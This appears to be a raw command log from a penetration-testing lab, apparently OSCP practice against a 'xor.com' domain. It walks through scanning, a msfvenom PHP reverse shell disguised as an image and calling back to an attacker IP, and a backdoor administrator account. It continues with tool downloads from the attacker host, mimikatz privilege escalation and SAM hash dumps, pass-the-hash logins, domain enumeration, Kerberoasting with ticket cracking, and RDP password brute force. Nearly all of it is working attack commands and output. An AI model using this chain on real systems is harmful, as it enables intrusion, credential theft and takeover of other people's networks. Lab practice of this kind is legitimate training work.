nmap -sTVC 10.11.1.123 -Pn > nmap.txt
nmap -v -p 139, 445 --script=smb* 10.11.1.123  > smb.txt
nmap -v -p 3306 --script=mysql* 10.11.1.123  > mysql.txt


gobuster dir  -u http://xor.com/  -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobuster.txt
gobuster dir  -u http://xor.com/books  -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobusterbooks.txt



msfvenom -p php/reverse_php LHOST=192.168.119.197 LPORT=443 -f raw -b '"' > evil.png




net user admin123 admin123 /add

net localgroup Administrators admin123 /add

rdesktop xor-app59.xor.com:3389

wget -Uri "http://192.168.119.197/mimikatz.zip" -OutFile "mimikatz.zip"
wget -Uri "http://192.168.119.197/master.zip" -OutFile "master.zip"

privilege::debug
token::elevate
#############################################
SID name  : NT AUTHORITY\SYSTEM

456     {0;000003e7} 1 D 27645          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;000f1f9b} 2 F 5363627     XOR-APP59\admin123      S-1-5-21-3051798232-4248191986-2095020414-1000
(14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 5403427     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)
#############################################



mimikatz # lsadump::sam
Domain : XOR-APP59
SysKey : e0d3dc476e21f4ab0a3f9f283829b231
Local SID : S-1-5-21-3051798232-4248191986-2095020414

SAMKey : d979bb48c9e23f5c09206913ca6bc030

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 3fee04b01f59a1001a366a7681e95699

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000003e8 (1000)
User : admin123
  Hash NTLM: 3008c87294511142799dca1191e69a0f
    lm  - 0: 3b735e3c61a5f3b1341debb3cbb20f5d
    ntlm- 0: 3008c87294511142799dca1191e69a0f


pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:3fee04b01f59a1001a366a7681e95699 //10.11.1.123 cmd
pth-winexe -U XOR-APP59%aad3b435b51404eeaad3b435b51404ee:ef2e1cf7719377742632188234a831d0 //10.11.1.123 cmd
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:3fee04b01f59a1001a366a7681e95699 //10.11.1.121 cmd



 sekurlsa::logonpasswords

sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
sekurlsa::pth /user:DWM-2 /domain:xor.com /ntlm:ef2e1cf7719377742632188234a831d0 /run:PowerShell.exe
sekurlsa::pth /user:DWM-2 /domain:xor.com /ntlm:ef2e1cf7719377742632188234a831d0 /run:PowerShell.exe




wget -Uri "http://192.168.119.197/master.zip" -OutFile "master.zip"





net user /domain
adam                     Administrator            albert
bethany                  bob                      brett
bruce                    carol                    chris
cory                     daisy                    david
ExchangeService          extmailservice           Guest
harry                    jeff                     john
kevin                    krbtgt                   maria
nicky                    nina                     pedro
pete                     ralph                    sherlock
sqlServer
The command completed with one or more errors.



net group /domain

*Cloneable Domain Controllers
*Company_Mail
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*HelpDesk_Personel
*Key Admins
*Mail_Editor
*Mail_Reader
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Server_Personel
*Workstation_Personel
The command completed with one or more errors.



net user albert /domain

User name                    albert
Full Name                    Albert
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/20/2019 12:07:08 PM
Password expires             Never
Password changeable          5/21/2019 12:07:08 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Mail_Editor          *Domain Admins
                             *Domain Users
The command completed successfully.



七、powershell .\GetUserSPNs.ps1   查看域使用的服務

ServicePrincipalName : HTTP/ExchangeService.xor.com
Name                 : ExchangeService
SAMAccountName       : ExchangeService
MemberOf             :
PasswordLastSet      : 5/20/2019 1:07:08 PM

ServicePrincipalName : HTTP/ExtMail.xor.com
Name                 : extmailservice
SAMAccountName       : extmailservice
MemberOf             :
PasswordLastSet      : 5/20/2019 1:07:09 PM

ServicePrincipalName : kadmin/changepw
Name                 : krbtgt
SAMAccountName       : krbtgt
MemberOf             : CN=Denied RODC Password Replication
                       Group,CN=Users,DC=xor,DC=com
PasswordLastSet      : 5/20/2019 12:57:59 PM

ServicePrincipalName : MSSQLSvc/xor-app23.xor.com:1433
Name                 : SQLServer
SAMAccountName       : sqlServer
MemberOf             :
PasswordLastSet      : 5/20/2019 1:11:14 PM

八、 powershell Add-Type -AssemblyName System.IdentityModel
九、 powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "kadmin/changepw"
powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"



[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()


Forest                  : xor.com
DomainControllers       : {xor-dc01.xor.com}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : xor-dc01.xor.com
RidRoleOwner            : xor-dc01.xor.com
InfrastructureRoleOwner : xor-dc01.xor.com
Name                    : xor.com


Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/xor-app23.xor.com:1433'


python /home/timmy/kali/oscp/10.11.1.123/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt /root/Downloads/0-60a10000-xor-app59$@krbtgt~XOR.COM-XOR.COM.kirbi


hashcat -m 2100 Dexter McPherson.txt /usr/share/wordlists/rockyou.txt

hashcat -m 13100 -a 0 spn.txt /usr/share/wordlists/rockyou.txt

  7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth            | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                    | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                    | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                    | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                   | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                   | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                        | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols


ncrack -v -i 10.11.1.123 --user albert -P /usr/share/wordlists/rockyou.txt -p rdp CL=1


python3 /home/timmy/kali/oscp/10.11.1.123/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt 2-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi
shantewhite@xor
sqlserver



rdesktop xor-app23.xor.com:3389
rdesktop 10.11.1.121:3389
xfreerdp /v:10.11.1.121 -sec-nla /u:""